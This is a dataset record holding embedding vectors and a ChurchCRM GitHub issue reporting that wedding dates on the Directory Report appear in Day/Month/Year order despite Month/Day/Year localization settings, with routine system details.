-0.028321508318185806, -0.013947609812021255, -0.013774430379271507, 0.01638544350862503, -0.0018217150354757905, -0.006810616701841354, 0.00726021733134985, 0.014440505765378475, -0.011583044193685055, 0.006763991434127092, -0.012222475372254848, 0.0015711042797192931, -0.002238011918962002, 0.0019915641751140356, -0.0008775537717156112, -0.023485803976655006, -0.00745337875559926, 0.012828604318201542, 0.011083487421274185, 0.005934727843850851, 0.02882772497832775, 0.003252111142501235, -0.016731802374124527, 0.013261552900075912, -0.007133662700653076, -0.026429854333400726, 0.03460925444960594, 0.00019909397815354168, -0.0015719368821009994, 0.009984463453292847, -0.006077934056520462, 0.02503109723329544, -0.007153645157814026, -0.00962478294968605, 0.04550624266266823, 0.0382859893143177, 0.0015902540180832148, 0.032371245324611664, -0.013974253088235855, 0.00580484326928854, 0.024724703282117844, -0.02127443440258503, -0.009504890069365501, 0.03759327158331871, 0.0241385567933321, -0.018716705963015556, -0.003806618507951498, -0.00044085836270824075, 0.0096847303211689, 0.024791309610009193, 0.01402753870934248, 0.018117239698767662, 0.002777532674372196, -0.007440057583153248, 0.007067055441439152, 0.001487844972871244, 0.00385324377566576, -0.00030472929938696325, -0.01357460767030716, -0.013181624002754688, -0.0018683403031900525, 0.00251776329241693, -0.0024528210051357746, 0.03173181042075157, -0.009131887927651405, -0.009265102446079254, -0.031358808279037476, -0.00013113350723870099, 0.008825493045151234, -0.024751346558332443, 0.005478466860949993, -0.008072828873991966, 0.009824605658650398, -0.015706047415733337, -0.005058839451521635, 0.020581716671586037, 0.0008733908180147409, -0.011669633910059929, 0.013341481797397137, 0.01343473233282566, -0.003986458759754896, -0.00649090064689517, -0.0033720044884830713, 0.0018183846259489655, -0.02206040360033512, -0.015972478315234184, -0.0006960483151488006, 0.008106132037937641, -0.010963593609631062, -0.017064841464161873, -0.014680292457342148, -0.02616342529654503, -0.015546189621090889, -0.005774870049208403, -0.014666970819234848, -0.0017467816360294819, -0.0030039981938898563, -0.009111905470490456, 0.00923179928213358, -0.013920966535806656, 0.007513325661420822, 0.01625222899019718, -0.012582155875861645, -0.03311724588274956, -0.011696276254951954, -0.0055916993878781796, 0.024831274524331093, 0.004322826396673918, 0.004902311600744724, 0.01542629674077034, -0.013328160159289837, -0.06175846979022026, -0.012195833027362823, 0.003939833492040634, 0.0006127889500930905, -0.00816607940942049, 0.0060446304269135, 0.00535191223025322, -0.00003829930938081816, -0.002707594772800803, -0.004569274373352528, -0.0004154642520006746, -0.019515996798872948, 0.029520442709326744, 0.008965369313955307, 0.012722032144665718, 0.01641208678483963, 0.0012364016147330403, -0.002066497690975666, 0.02034192904829979, 0.00253774574957788, 0.022539976984262466, 0.009937838651239872, 0.007206931244581938, -0.00008169825741788372, -0.0019882337655872107, -0.010017767548561096, -0.006334372796118259, -0.017984023317694664, -0.029520442709326744, 0.00017921580001711845, -0.01357460767030716, 0.011216702871024609, 0.0033020665869116783, 0.004252888727933168, 0.01647869497537613, 0.0193294957280159, 0.017171412706375122, 0.03290410339832306, -0.018769992515444756, 0.008265990763902664, -0.005941388662904501, 0.02403198555111885, -0.019009780138731003, 0.001272203167900443, 0.003443607594817877, -0.015106580220162868, 0.019089708104729652, 0.00037341826828196645, -0.019049745053052902, 0.018050631508231163, 0.015559511259198189, -0.011829491704702377, -0.018969815224409103, 0.020914753898978233, -0.000009099989256355911, 0.010843700729310513, -0.0027492244262248278, 0.0002868285228032619, 0.0064209625124931335, 0.008212704211473465, 0.02808172069489956, 0.013394767418503761, -0.004076378885656595, -0.0022213601041585207, -0.009025315754115582, 0.0051221163012087345, 0.005525091663002968, -0.0033836609218269587, 0.02023535780608654, -0.026789534837007523, 0.009311728179454803, -0.00746670039370656, -0.0096181221306324, 0.003463589819148183, 0.013181624002754688, -0.003490232862532139, 0.018117239698767662, 0.013854359276592731, 0.012282422743737698, 0.005245340522378683, -0.009531532414257526, -0.006454266607761383, -0.017144769430160522, -0.0027708718553185463, 0.004912302829325199, -0.009711372666060925, 0.04260215535759926, 0.0008151092333719134, 0.03455596789717674, -0.0022729807533323765, -0.0033803305123001337, -0.007193609606474638, -0.001843362464569509, 0.030346374958753586, 0.015506225638091564, 0.005528422072529793, -0.026443175971508026, 0.02023535780608654, 0.01117007713764906, -0.018903207033872604, -0.0027025991585105658, 0.004642542451620102, -0.0010773763060569763, -0.014187396503984928, -0.012402315624058247, -0.020488465204834938, -0.00923846010118723, 0.015239795669913292, -0.008192721754312515, -0.021047968417406082, -0.005535082891583443, -0.010177625343203545, 0.004872338380664587, 0.012821943499147892, -0.008405866101384163, -0.025337491184473038, 0.03290410339832306, -0.009411639533936977, 0.020768217742443085, 0.012748674489557743, 0.0002593529352452606, 0.012015992775559425, 0.01496004406362772, 0.02214033156633377, -0.003710037562996149, 0.012189172208309174, 0.0096980519592762, 0.003586813807487488, -0.004226245917379856, -0.011336595751345158, 0.014986686408519745, -0.004023092798888683, 0.009365013800561428, 0.02126111276447773, 0.013134998269379139, 0.025843709707260132, 0.0144538264721632, 0.008505777455866337, -0.024178521707654, -0.00039402497350238264, 0.018863243982195854, -0.009904534555971622, 0.012169189751148224, -0.03303731977939606, -0.023512447252869606, -0.0017134778900071979, 0.014800186268985271, 0.0005008050939068198, 0.005411859136074781, 0.01634548045694828, -0.017024876549839973, 0.014320611953735352, 0.0039165206253528595, 0.001527809421531856, -0.005711592733860016, 0.01148979365825653, -0.007526647299528122, 0.0003821605059783906, 0.0040097711607813835, 0.001989898970350623, 0.021860580891370773, -0.029440512880682945, -0.000491646584123373, 0.008219365030527115, -0.00917185191065073, -0.01553286798298359, 0.014640327543020248, 0.005202045664191246, 0.010324162431061268, 0.011569722555577755, -0.00039902052958495915, -0.0193428173661232, -0.0007455876911990345, -0.0023629008792340755, 0.002043185057118535, 0.013867680914700031, 0.024431629106402397, 0.003035636618733406, -0.030186517164111137, -0.013747787103056908, 0.012242457829415798, -0.015772655606269836, -0.011569722555577755, -0.0024827944580465555, 0.006640767678618431, 0.030479591339826584, 0.003953155130147934, -0.003956485539674759, -0.006301069166511297, -0.02110125496983528, -0.010663860477507114, 0.018650099635124207, 0.010943612083792686, -0.004845695570111275, -0.017118126153945923, 0.004789079073816538, -0.006274426355957985, 0.010903647169470787, 0.011576383374631405, -0.018077274784445763, -0.023312624543905258, -0.005928067024797201, -0.00744671793654561, 0.010910307988524437, -0.01918295957148075, 0.001860014395788312, -0.009844588115811348, -0.0056449854746460915, 0.0026659651193767786, 0.003766654059290886, 0.020741574466228485, 0.021061290055513382, 0.001770094269886613, -0.010677182115614414, 0.0028841046150773764, -0.00965142622590065, 0.00014091648336034268, -0.0016102362424135208, 0.016825053840875626, 0.008938726037740707, 0.00430617481470108, 0.013341481797397137, -0.008978690952062607, 0.02212700992822647, 0.002043185057118535, 0.02605685219168663, -0.016158979386091232, 0.017144769430160522, -0.006953822914510965, 0.001899978844448924, 0.007952935062348843, 0.0144538264721632, -0.01011101808398962, 0.011203381232917309, -0.017131447792053223, -0.02597692422568798, 0.006827268283814192, 0.017664307728409767, 0.004179620649665594, 0.004802400711923838, 0.0013987574493512511, 0.013268213719129562, -0.008359241299331188, 0.0003979798057116568, -0.008365901187062263, -0.005421850364655256, -0.003408638760447502, 0.010217590257525444, -0.008339258842170238, 0.02114121988415718, 0.0020981361158192158, -0.003996449988335371, 0.007879666984081268, 0.009917856194078922, -0.002935725497081876, 0.01248224452137947, -0.01841031201183796, -0.02499113231897354, 0.012222475372254848, -0.006860572379082441, 0.01104352343827486, 0.008319276385009289, 0.015599476173520088, 0.0023062846157699823, 0.0063776676543056965, -0.007593254558742046, -0.01159636490046978, -0.023006228730082512, -0.007719808723777533, 0.0055484045296907425, 0.010870343074202538, -0.01729130558669567, -0.01248224452137947, 0.010317501612007618, -0.00814609695225954, -0.006134550552815199, 0.006680732127279043, -0.0022296858951449394, -0.0014786864630877972, -0.009511550888419151, -0.013341481797397137, -0.011509775184094906, -0.011343256570398808, 0.024724703282117844, 0.02491120435297489, 0.00041234202217310667, -0.003789966693148017, 0.008572384715080261, -0.004096360877156258, 0.018663421273231506 ]
null
null
null
null
null
null
null
null
null
[ "ChurchCRM", "CRM" ]
**Describe the issue** When doing a Directory Report the long date format for Weddings is in Day/Month/Year order even though the localization settings are set to Month/Day/Year I checked the ConfirmReport.php and it shows that it should be pulling the long date format from the database. Not sure what to do. Collected Value Title | Data ----------------------|---------------- Page Name |/v2/dashboard Screen Size |1080x1920 Window Size |963x1854 Page Size |1137x1854 Platform Information | Linux peter 6.8.9-zabbly+ #ubuntu22.04 SMP PREEMPT_DYNAMIC Fri May 3 16:30:27 UTC 2024 x86_64 PHP Version | 8.3.6 SQL Version | 10.6.16-MariaDB-0ubuntu0.22.04.1 ChurchCRM Version |5.7.0 Reporting Browser |Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0 Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Wedding Date in wrong order on Directory Report
https://api.github.com/repos/ChurchCRM/CRM/issues/7001/comments
5
2024-05-06T01:02:42
2024-05-09T17:27:37Z
https://github.com/ChurchCRM/CRM/issues/7001
2,279,837,819
7,001
false
This is a GitHub Issue repo:CRM owner:ChurchCRM Title : Wedding Date in wrong order on Directory Report Issue date: --- start body --- **Describe the issue** When doing a Directory Report the long date format for Weddings is in Day/Month/Year order even though the localization settings are set to Month/Day/Year I checked the ConfirmReport.php and it shows that it should be pulling the long date format from the database. Not sure what to do. Collected Value Title | Data ----------------------|---------------- Page Name |/v2/dashboard Screen Size |1080x1920 Window Size |963x1854 Page Size |1137x1854 Platform Information | Linux peter 6.8.9-zabbly+ #ubuntu22.04 SMP PREEMPT_DYNAMIC Fri May 3 16:30:27 UTC 2024 x86_64 PHP Version | 8.3.6 SQL Version | 10.6.16-MariaDB-0ubuntu0.22.04.1 ChurchCRM Version |5.7.0 Reporting Browser |Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0 Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"] --- end body ---
1,031
[ 0.017630524933338165, -0.0021610411349684, -0.013248929753899574, 0.04240252450108528, -0.0026706152129918337, 0.03157128393650055, 0.007178673520684242, 0.039843495935201645, -0.022495655342936516, 0.027479812502861023, 0.02685493417084217, 0.017630524933338165, -0.012824904173612595, 0.031541530042886734, -0.0501093715429306, 0.012757953256368637, -0.038147397339344025, -0.003957569133490324, 0.012408317998051643, 0.022287363186478615, -0.018642233684659004, 0.04267033189535141, 0.013918443582952023, 0.04811570793390274, 0.019862236455082893, 0.004872571211308241, -0.011351974681019783, -0.0019732052460312843, -0.002968176733702421, -0.010511362925171852, 0.028417130932211876, 0.04790741577744484, -0.021647606045007706, -0.01850832998752594, 0.02871469408273697, -0.013777101412415504, 0.010161728598177433, 0.051002055406570435, -0.038623493164777756, 0.022614680230617523, -0.04014105722308159, 0.006985258311033249, 0.038296177983284, 0.014714420773088932, -0.010950266383588314, 0.012043804861605167, 0.000762501556891948, 0.028461765497922897, -0.035885926336050034, 0.00804160162806511, 0.006148366257548332, -0.026051517575979233, -0.010667582973837852, -0.021602971479296684, 0.001544530619867146, -0.03594544157385826, 0.022867608815431595, 0.0239090733230114, -0.0028007985092699528, 0.02020443230867386, -0.00832428503781557, 0.012356244958937168, 0.0010117094498127699, 0.012787709012627602, 0.017511500045657158, 0.030366159975528717, -0.039040081202983856, 0.025783712044358253, 0.005690865218639374, 0.012683562934398651, -0.007081965915858746, -0.006769526284188032, 0.04704448580741882, 0.027688106521964073, 0.005229644943028688, -0.026363955810666084, 0.0734977126121521, -0.00572434114292264, -0.03782007843255997, 0.0171841811388731, -0.01956467516720295, -0.002581346780061722, -0.05552499368786812, 0.017957841977477074, 0.01580052077770233, -0.015183079987764359, 0.016946133226156235, -0.07248600572347641, -0.04210496321320534, 0.025679564103484154, -0.01252734288573265, -0.013055514544248581, -0.022436143830418587, -0.027673227712512016, -0.01660393737256527, -0.019058819860219955, -0.01155282836407423, 0.03999227657914162, -0.03701665997505188, 0.006806721445173025, -0.002479060087352991, -0.05385864898562431, -0.02231711894273758, 0.0021703399252146482, 0.03082738071680069, -0.029146157205104828, 0.024652978405356407, -0.05748889967799187, 0.009365751408040524, 0.08688798546791077, 0.026051517575979233, 0.009879044257104397, -0.026988836005330086, -0.0033401288092136383, -0.05653670057654381, 0.04659814387559891, 0.004009642172604799, -0.019698577001690865, 0.020754920318722725, 0.015592226758599281, -0.05231132730841637, -0.03380299732089043, 0.034546900540590286, -0.026944201439619064, -0.019847357645630836, 0.018999306485056877, -0.011909902095794678, 0.023760292679071426, -0.006713733542710543, -0.01289929449558258, -0.023432975634932518, -0.004727509804069996, 0.009216969832777977, 0.010131971910595894, 0.004500619135797024, 0.005251962225884199, 0.011113924905657768, 0.021111994981765747, 0.0019360100850462914, -0.03538007289171219, -0.014535883441567421, -0.04993083328008652, 0.026200298219919205, -0.01343490555882454, -0.005504889413714409, -0.004225374665111303, 0.014446615241467953, 0.001926711294800043, 0.035023000091314316, -0.013620881363749504, -0.01871662400662899, -0.030276890844106674, 0.02463809959590435, 0.049454737454652786, 0.03552885353565216, -0.04689570516347885, 0.021245896816253662, -0.02010028436779976, -0.059928905218839645, -0.015785641968250275, -0.01398539450019598, 0.02268907055258751, 0.0028658900409936905, -0.024355415254831314, 0.01786857284605503, 0.011805756017565727, -0.007383246906101704, 0.035290803760290146, -0.0004586633003782481, 0.012252097949385643, -0.041480086743831635, 0.0005690865218639374, -0.04674692451953888, -0.035766903311014175, -0.01960930787026882, 0.000049428930651629344, 0.020531749352812767, 0.025367125868797302, -0.007677088957279921, -0.030366159975528717, -0.010994900949299335, -0.0026371395215392113, -0.0013306582113727927, -0.025039806962013245, -0.012125634588301182, 0.005326352547854185, 0.00859209056943655, -0.013888686895370483, 0.026572249829769135, 0.03573714569211006, 0.00048818698269315064, -0.007803552784025669, 0.0198771134018898, -0.03231518715620041, -0.011225511319935322, -0.009514532051980495, 0.008450749330222607, -0.018805893138051033, -0.01440942008048296, -0.0009949716040864587, 0.02770298346877098, -0.014044906944036484, -0.03546934202313423, 0.011262706480920315, 0.035766903311014175, 0.036510806530714035, 0.015339300036430359, 0.05805426463484764, -0.008897091262042522, -0.03061908669769764, 0.002769182436168194, 0.015726130455732346, 0.042848870158195496, 0.06224988400936127, -0.011701609008014202, 0.024891026318073273, -0.004139825701713562, 0.0005556032992899418, 0.005307754967361689, -0.008904530666768551, 0.0018932356033474207, -0.01629149727523327, 0.00837635900825262, 0.01724369451403618, -0.018627354875206947, -0.01034026499837637, -0.015019421465694904, 0.011753682978451252, 0.019014185294508934, 0.00146084139123559, 0.00525940116494894, -0.06284500658512115, -0.004407631233334541, 0.001435734680853784, 0.05561425909399986, -0.009023555554449558, 0.03558836504817009, -0.007848186418414116, -0.0352015346288681, -0.020278822630643845, 0.01289929449558258, -0.006475684233009815, -0.010459289886057377, -0.00444110669195652, 0.018746379762887955, -0.01131477952003479, 0.008770627900958061, 0.011195754632353783, -0.025709321722388268, 0.01770491525530815, 0.007431600708514452, 0.000523057475220412, -0.012609172612428665, -0.01517564058303833, 0.008108553476631641, -0.010295631363987923, -0.039635203778743744, 0.024132244288921356, 0.023864438757300377, 0.007171234115958214, 0.006044219713658094, 0.03442787751555443, -0.03642153739929199, 0.009395507164299488, 0.027509568259119987, -0.022495655342936516, -0.04811570793390274, 0.009826971217989922, 0.01722881570458412, -0.01221490278840065, 0.027212006971240044, -0.033862508833408356, 0.034874219447374344, -0.019653942435979843, 0.0032657384872436523, -0.014335029758512974, -0.013791979290544987, -0.01548808068037033, 0.007818430662155151, 0.002425126964226365, -0.019281990826129913, 0.015413690358400345, 0.01649978943169117, 0.02384956181049347, -0.0019899432081729174, 0.011909902095794678, 0.005501169711351395, -0.025367125868797302, -0.012728196568787098, 0.01131477952003479, 0.003513086587190628, -0.01141892559826374, -0.0025999443605542183, -0.0017881591338664293, 0.004035679157823324, 0.0026873531751334667, -0.0172883290797472, 0.054691821336746216, 0.00112980417907238, 0.02093345858156681, 0.017690036445856094, -0.0002854731574188918, -0.04397960379719734, -0.0035465622786432505, -0.013717588968575, 0.031690310686826706, -0.012743075378239155, 0.012571977451443672, -0.06159524992108345, -0.039367396384477615, 0.04820497706532478, -0.013821735978126526, 0.009492214769124985, -0.0018476714612916112, 0.022287363186478615, 0.003565159859135747, 0.010310509242117405, -0.0011484017595648766, -0.005430499091744423, -0.045824483036994934, -0.03728446736931801, -0.00944014173001051, -0.06736794114112854, -0.024414928629994392, 0.015607105568051338, -0.02273370511829853, -0.029042011126875877, -0.0021796387154608965, -0.0171841811388731, -0.021766630932688713, -0.0027822009287774563, -0.035885926336050034, -0.005326352547854185, -0.010727095417678356, 0.0004928364069201052, -0.039159104228019714, -0.024667855352163315, -0.011240389198064804, 0.018047111108899117, -0.016782473772764206, -0.02099297009408474, 0.03770105168223381, 0.017213938757777214, 0.018582720309495926, 0.0019750650972127914, -0.011612340807914734, -0.0010182185797020793, -0.016202228143811226, 0.03014298900961876, -0.03826642036437988, 0.0008843158138915896, -0.0148036889731884, -0.015398812480270863, 0.034606412053108215, -0.005158973857760429, 0.015532715246081352, -0.036302514374256134, -0.039159104228019714, 0.005110620055347681, 0.005140376277267933, -0.023447852581739426, -0.033862508833408356, -0.006021902430802584, 0.027137616649270058, 0.045556679368019104, -0.023194925859570503, 0.012229781597852707, -0.01104697398841381, 0.03231518715620041, -0.024028098210692406, -0.03410055860877037, 0.01314478274434805, -0.02786664292216301, -0.023194925859570503, -0.05650694668292999, 0.013866369612514973, 0.003738117404282093, 0.01289929449558258, 0.04118252545595169, 0.00015993935812730342, -0.016351008787751198, 0.02829810604453087, -0.048145465552806854, -0.011344535276293755, 0.006776965223252773, -0.007967211306095123, 0.026944201439619064, -0.021870777010917664, -0.000012633290680241771, -0.022451022639870644, -0.050258152186870575, 0.03600495308637619, -0.015369055792689323, -0.050734251737594604, -0.03594544157385826, 0.009715385735034943, -0.013204295188188553, -0.0030574453994631767, 0.006185561418533325, 0.015577348880469799, 0.004545253235846758, -0.02791127748787403, 0.052787426859140396, -0.004296045284718275, -0.008242456242442131, 0.00017365507665090263, -0.0017909487942233682, -0.014096979983150959, 0.03145226091146469, 0.04475326091051102, 0.0068178800866007805, 0.054245475679636, -0.035082511603832245, -0.0013390271924436092, 0.025783712044358253, 0.016217106953263283, 0.006698855198919773, 0.03523129224777222, -0.021766630932688713, -0.00006079090235289186, 0.01184295117855072, -0.0015491800149902701, -0.03273177519440651, 0.02172199636697769, -0.019148088991642, 0.023135414347052574, -0.010057581588625908, 0.04475326091051102, 0.06344012916088104, 0.00944014173001051, 0.0146474689245224, -0.03475519269704819, 0.018389306962490082, 0.007137758657336235, 0.01608320325613022, 0.014989664778113365, -0.010533680208027363, -0.027836887165904045, -0.0013464661315083504, 0.017303206026554108, -0.04293813556432724, 0.019148088991642, 0.01813637837767601, 0.00640873285010457, -0.02374541386961937, 0.0013985394034534693, -0.04130154848098755, 0.02008540742099285, -0.010399777442216873, 0.04150984063744545, 0.008807823061943054, 0.01950516179203987, -0.013687833212316036, -0.02035321295261383, -0.012973684817552567, 0.009960873983800411, -0.0171841811388731, -0.0011660694144666195, 0.03981374204158783, 0.043235696852207184, -0.03451714292168617, -0.03279128670692444, -0.009469897486269474, -0.00411006947979331, 0.03157128393650055, -0.0393376424908638, 0.011746243573725224, -0.03505275398492813, 0.033654216676950455, 0.017109790816903114, -0.002886347472667694, 0.025843223556876183, 0.00781099172309041, 0.0005128288175910711, -0.01670808345079422, 0.040260083973407745, -0.016797350719571114, 0.0035670194774866104, 0.021379800513386726, -0.004024520516395569, -0.03686787933111191, -0.026304444298148155, 0.0035298243165016174, 0.05912548676133156, -0.01223722007125616, -0.025411760434508324, -0.01633613184094429, -0.027420300990343094, -0.04008154571056366, 0.011902463622391224, 0.02304614521563053, 0.021379800513386726, -0.021960044279694557, -0.030172744765877724, -0.012847221456468105, 0.017749547958374023, 0.02126077562570572, -0.002560889348387718, 0.018895160406827927, -0.04966302961111069, 0.014907835982739925, -0.008257334120571613, 0.03219616413116455, -0.023432975634932518, -0.013204295188188553, -0.014104419387876987, -0.021231019869446754, -0.0018737080972641706, -0.014126736670732498, 0.009730263613164425, 0.024563709273934364, -0.026929324492812157, -0.0057503776624798775, -0.039783984422683716, -0.010972583666443825, -0.004593607038259506, 0.0035558610688894987, -0.004917205311357975, 0.023239560425281525, -0.013271247036755085, -0.011091608554124832, -0.028223715722560883, -0.01213307399302721, 0.028580790385603905, 0.02273370511829853, 0.0058694020844995975, 0.02919079177081585, 0.021498825401067734, -0.0035242449957877398, 0.007721723057329655, -0.041896671056747437, -0.018478574231266975, 0.05183522775769234, 0.03532056137919426, -0.001211633556522429, -0.015636861324310303, -0.0190439410507679, -0.013308442197740078, -0.004463423974812031, -0.012393440119922161, -0.0038943372201174498, 0.04403911530971527, -0.017466865479946136, -0.02923542633652687, 0.0042700087651610374, 0.014922713860869408, -0.007870503701269627, 0.029265182092785835, -0.013055514544248581, -0.019966382533311844, -0.0245339535176754, -0.0174966212362051, -0.000532821228262037, 0.0006351080373860896, -0.0005193379474803805, 0.029265182092785835, 0.016351008787751198, 0.02326931618154049, -0.01993662677705288, 0.011828073300421238, -0.00564623111858964, 0.030797624960541725, -0.03523129224777222, 0.01792808622121811, 0.0015752166509628296, 0.011813195422291756, -0.013561368919909, 0.07665186375379562, -0.02041272446513176, -0.032077137380838394, 0.01960930787026882, 0.011723926290869713, -0.04061715677380562, -0.02706322632730007, 0.024310782551765442, 0.0062711103819310665, -0.007212148979306221, -0.008554895408451557, -0.019594430923461914, -0.023447852581739426, 0.020740043371915817, -0.0030165305361151695, -0.005865682847797871, -0.01022867951542139, -0.001887656282633543, 0.012728196568787098, 0.003994764294475317, -0.008554895408451557, 0.0024716209154576063, -0.006483123172074556, 0.0053747063502669334, 0.027420300990343094, 0.007405564188957214, 0.015517836436629295, 0.022599803283810616, 0.007089404854923487, -0.022019557654857635, 6.756159223186842e-7, 0.06611818820238113, 0.03689763695001602, -0.00012216297909617424, 0.04499131068587303, 0.01155282836407423, 0.005214766599237919, -0.02496541664004326, 0.006959221791476011, 0.028997376561164856, 0.018374428153038025, 0.0013827314833179116, 0.01760076731443405, -0.057816214859485626, 0.00885989610105753, 0.009640995413064957, -0.01834467239677906, -0.00999063067138195, -0.008361480198800564, 0.04421765357255936, -0.005657389760017395, 0.013606003485620022, -0.014000272378325462, 0.015019421465694904, 0.00584336556494236, -0.000996831338852644, -0.004162142518907785, 0.008926847949624062, 0.009819532744586468, 0.021350044757127762, -0.007505991030484438, -0.010154289193451405, -0.020650774240493774, -0.016053447499871254, -0.002983054844662547, -0.010459289886057377, -0.04293813556432724, 0.0073386128060519695, 0.018061988055706024, -0.01713954657316208, 0.009068189188838005, -0.02384956181049347, -0.02623005397617817, -0.020635895431041718, -0.005556962452828884, 0.01606832630932331, 0.07415235042572021, -0.02188565395772457, 0.009202091954648495, 0.015889788046479225, 0.0030853417702019215, 0.038296177983284, 0.02215345948934555, -0.03764154016971588, -0.021439312025904655, 0.016737839207053185, 0.005147815681993961, -0.0193563811480999, 0.009112823754549026, -0.007141477894037962, -0.006442208308726549, -0.005125498399138451, 0.004478301852941513, -0.04403911530971527, -0.027241762727499008, 0.005069705657660961, -0.003332689870148897, 0.03003884293138981, 0.012906733900308609, -0.003648848971351981, 0.0011530511546880007, 0.015428568236529827, 0.016187351197004318, 0.0247422456741333, -0.00605537835508585, -0.007706845179200172, -0.04755034297704697, 0.0037436967249959707, 0.002733847126364708, 0.0038348250091075897, 0.012683562934398651, -0.025724198669195175, 0.012036366388201714, 0.00028733292128890753, 0.0002854731574188918, 0.012036366388201714, 0.025396881625056267, 0.024786880239844322, 0.008688798174262047, -0.007639893796294928, -0.0035818975884467363, 0.015212835744023323, -0.02829810604453087, -0.001638448447920382, 0.0012785849394276738, 0.0084879444912076, 0.017258571460843086, 0.007892820984125137, -0.011798316612839699, 0.007617576513439417, 0.007818430662155151, 0.002477200236171484, 0.0004807479272130877, -0.025679564103484154, 0.004604765679687262, 0.025515906512737274, -0.007446478586643934, -0.04469374939799309, 0.011768560856580734, -0.004563850816339254, 0.011924780905246735, 0.03648104891180992, -0.012140512466430664, -0.013226612471044064, -0.012624050490558147, -0.041271790862083435, -0.0006871813093312085, -0.02759883739054203, 0.0397542268037796, 0.012512465007603168, 0.001132593839429319, -0.019758088514208794, -0.011924780905246735, -0.011039534583687782, -0.031392745673656464, -0.0034033607225865126, -0.00790769886225462, -0.014044906944036484, 0.02432565949857235, 0.006319464184343815, 0.013844053260982037, 0.015011982060968876, 0.019058819860219955, -0.021216141059994698, 0.021111994981765747, 0.05534645542502403, 0.0031243967823684216, -0.027167372405529022, -0.01745198667049408, 0.015116129070520401, -0.01104697398841381, -0.004002203233540058, 0.006535196211189032, -0.0026334200520068407, 0.025084441527724266, 0.008874773979187012, -0.009596360847353935, 0.01213307399302721, 0.013226612471044064, 0.014022589661180973, 0.009373189881443977, 0.001137243234552443, 0.008391236886382103, 0.04383082315325737, 0.001359484507702291, 0.0036321112420409918, -0.006881111767143011, -0.0017156285466626287, 0.003481470514088869, 0.03448738902807236, -0.009618678130209446, 0.03579665720462799, -0.030336404219269753, -0.011835511773824692, -0.01612783782184124, -0.009908800944685936, 0.020591262727975845, 0.015212835744023323, 0.040051788091659546, 0.009774898178875446, -0.0272268857806921, 0.022703949362039566, 0.0007931875879876316, -0.023299071937799454, -0.004262569826096296, -0.015785641968250275, 0.022198094055056572, 0.023656146600842476, -0.020501993596553802, -0.01608320325613022, -0.014454053714871407, -0.010213801637291908, 0.008718554861843586, -0.020174676552414894, -0.022064192220568657, -0.03055957518517971, -0.03097616136074066, 0.03341616690158844, -0.011136242188513279, -0.007576662115752697, -0.011084169149398804, -0.010042703710496426, -0.006832757964730263, 0.005039949435740709, -0.005501169711351395, 0.015138445422053337, -0.048621565103530884, 0.02395370788872242, -0.03987325355410576, 0.014528444968163967, 0.01960930787026882, -0.015993935987353325, -0.004801900126039982, 0.003935251850634813, 0.025560541078448296, -0.04142057150602341, -0.032702017575502396, -0.010392338037490845, -0.018746379762887955, -0.00182070501614362, 0.006639342755079269, -0.010823803022503853, 0.032017625868320465, -0.013464662246406078, 0.013100149109959602, 0.018701745197176933, 0.020427603274583817, -0.003931532613933086, -0.0029440000653266907, -0.0026259811129420996, 0.024236390367150307, -0.006323183886706829, 0.030232258141040802, -0.005925195291638374, -0.023090779781341553, 0.008145748637616634, -0.0024586026556789875, 0.008034163154661655, -0.03282104432582855, -0.0031169576104730368, -0.005277998745441437, 0.020055651664733887, -0.0013464661315083504, -0.027152495458722115, -0.022778339684009552, -0.013003441505134106, -0.022808095440268517, -0.02533736824989319, 0.013732466846704483, -0.016737839207053185, 0.015116129070520401, -0.02374541386961937, 0.03163079544901848, 0.026304444298148155, -0.013025758787989616, -0.00938806775957346, -0.0048242174088954926, 0.005132937338203192, -0.023552000522613525, -0.04490204527974129, -0.026155663654208183, -0.011136242188513279, 0.0009605659870430827, 0.03764154016971588, 0.015473202802240849, -0.03526104986667633, 0.029101522639393806, 0.013494418002665043, -0.013873809017241001, -0.0017714212881401181, 0.010898193344473839, -0.019058819860219955, -0.0004835375875700265, -0.007550625130534172, 0.024400049820542336, -0.0010098495986312628, 0.001001480733975768, 0.021111994981765747, -0.014729298651218414, 0.00761385727673769, -0.024295903742313385, 0.010012947022914886, -0.01813637837767601, 0.00463824113830924, 0.007528308313339949, 0.02332882769405842, -0.03716544061899185, -0.011790878139436245, -0.012802586890757084, 0.022391509264707565, -0.02316517010331154, 0.021498825401067734, -0.00944014173001051, -0.009596360847353935, 0.010987461544573307, -0.0529957190155983, -0.014714420773088932, 0.0061967200599610806, -0.01687174290418625, -0.005341230425983667, -0.014818566851317883, -0.003550281748175621, 0.010712217539548874, 0.012200024910271168, 0.01289929449558258, -0.017957841977477074, -0.013345637358725071, -0.0011279444443061948, 0.01645515486598015, -0.004734948743134737, -0.0389210544526577, -0.001660765614360571, -0.03612397611141205, -0.012750513851642609, 0.018225647509098053, 0.02246589958667755, 0.0030183903872966766, -0.0009484775364398956, 0.006836477667093277, 0.02463809959590435, -0.02755420282483101, 0.001189316506497562, 0.0013622741680592299, 0.015874911099672318, -0.015339300036430359, -0.010280752554535866, 0.013308442197740078, 0.0042328136041760445, -0.03874251991510391, -0.0447235070168972, 0.030053719878196716, -0.0048279366455972195, 0.00793001614511013, -0.008919408544898033, 0.036778613924980164, 0.030381038784980774, -0.004039398394525051, 0.010198923759162426, 0.017809061333537102, -0.012519903481006622, -0.03543958440423012, 0.006803001742810011, 0.013248929753899574, -0.033118605613708496, -0.006498001050204039, 0.0029030852019786835, -0.01877613551914692, -0.010310509242117405, -0.017362719401717186, 0.016410522162914276, 0.012170269154012203, 0.022302240133285522, -0.021855898201465607, 0.003819946898147464, 0.0018448818009346724, 0.015889788046479225, -0.02198980189859867, 0.005397023167461157, 0.010875876061618328, 0.008659042418003082, 0.008071358315646648, 0.0119545366615057, -0.03282104432582855, -0.003745556576177478, -0.031065430492162704, -0.029904939234256744, 0.0006011673831380904, 0.04701473191380501, 0.024772001430392265, -0.04442594572901726, 0.01451356615871191, 0.02681029960513115, -0.011508194729685783, -0.030648844316601753, 0.003042567288503051, 0.0034089400433003902, 0.001310200896114111, -0.0033996410202234983, 0.0215285811573267, 0.010042703710496426, 0.0399625226855278, 0.0215285811573267, -0.029369328171014786, 0.0432654544711113, 0.02670615166425705, 0.022242728620767593, -0.004601045977324247, -0.032969824969768524, 0.01770491525530815, 0.010451850481331348, -0.01414161454886198, -0.0068550752475857735, -0.01876125857234001, 